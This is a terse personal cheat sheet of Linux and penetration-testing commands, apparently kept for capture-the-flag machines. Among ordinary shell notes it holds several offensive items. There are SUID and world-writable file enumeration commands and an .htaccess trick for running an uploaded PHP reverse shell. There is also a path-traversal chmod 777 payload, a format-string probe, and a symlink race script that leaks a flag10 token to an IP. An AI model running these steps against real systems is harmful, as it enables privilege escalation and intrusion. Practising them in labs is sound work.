
######Find all setuserid programs
find / -perm +6000 -type f 2>/dev/null
sudo find / -perm -2 ! -type l -ls #file that can be written to
find / -perm +6000 -type f 2>/dev/null
find / -perm -4000 -user root 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
__________Find files changed in the last 10 minutes
find / -mmin -10 2>/dev/null

find / -writable -type d 2>/dev/null
++++++++++++++++++++++++++++++++++++++++
__Command line file descriptors
> file redirects stdout to file
1> file redirects stdout to file
2> file redirects stderr to file
&> file redirects stdout and stderr to file
##########Run command in background and discard stdout and stderr
command > /dev/null 2>&1 &


++++++++++++++
_______________php

____________________-execute commandline php
php -f <phpfilename.php>
php -a ----------php interactive shell


_____________Perl

perl -MCPAN -e shell 

The perl CGI module has a escapeHTML function that makes it pretty easy:
perl -e 'use CGI qw(escapeHTML); print escapeHTML("<hi>\n");'
Or to do an entire file:
perl -p -e 'BEGIN { use CGI qw(escapeHTML); } $_ = escapeHTML($_);'  FILENAME

____________system
printenv
typeset
printenv
typeset type
set -h track command line
alias -r print all the aliases
bash -
base set -o posix

forensics tool
________________________
foremost
s a console program to recover files based on their headers, footers, and internal data structures. This process is commonly referred to as data carving. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. The headers and footers can be specified by a configuration file or you can use command line switches to specify built-in file types. These built-in types look at the data structures of a given file format allowing for a more reliable and faster recovery.




__________________mysql
_____________nikto
nikto -host 192.168.0.109 -useproxy http://192.168.0.109:3129


___________images

exiftools <image file name>


___Debian

dpkg --get-selections|grep 'linux-image*'|awk '{print $1}'|egrep -v "linux-image-$(uname -r)|linux-image-generic" |while read n;do apt-get -y remove $n;done

__________Ruby
  pry >> 3192.to_s(16) get hex 



__TOR
  sudo /etc/init.d/tor start
  ss -aln | grep 9050




___cycle through history Bash

"\e[A": history-search-backward            # arrow up

______________________.htaccess 

echo -e 'AddType application/x-httpd-php .php\nAllow from ALL' > .htaccess
python server upload rshell.php to upload directory
from the remote server [ssh'd into]

operating system path traversal
'/usr/bin/../../bin/chmod -R 777 /home/admin' > /tmp/runthis



__________________searchsploit
search --nmap scan.xml

/remotezen/Tools/exploit-database/searchsploit -t apache httpd 2 2 15

vim remove new lines
:%s/\n/g
_________________________sudo to another user
sudo -u fristi ./doCom su
____________________________nmap with proxy
  nmap --proxy http://sick -T5 -A -v -sT -Pn 127.0.0.1
use a symlink
+++++++++++++++++++++++++++
ln -s /bin/sh mail
_____________________________format string vulnerability
  0
  %39$x

 ________________________Kadimus______________ 
must run kadimus from it's directory
search for remotezen execution

#!/bin/bash

unlink /tmp/token
touch /tmp/token
/home/flag10/flag10 /tmp/token 192.168.1.74 &
rm -f /tmp/token
ln -s /home/flag10/token /tmp/token
